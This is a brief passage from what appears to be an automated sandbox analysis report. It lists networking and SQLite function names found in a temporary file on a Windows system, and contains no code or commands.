Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC96070 PR_Listen, 9_2_6CC96070
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC9C030 sqlite3_bind_parameter_count, 9_2_6CC9C030
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC222D0 sqlite3_bind_blob, 9_2_6CC222D0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC963C0 PR_Bind, 9_2_6CC963C0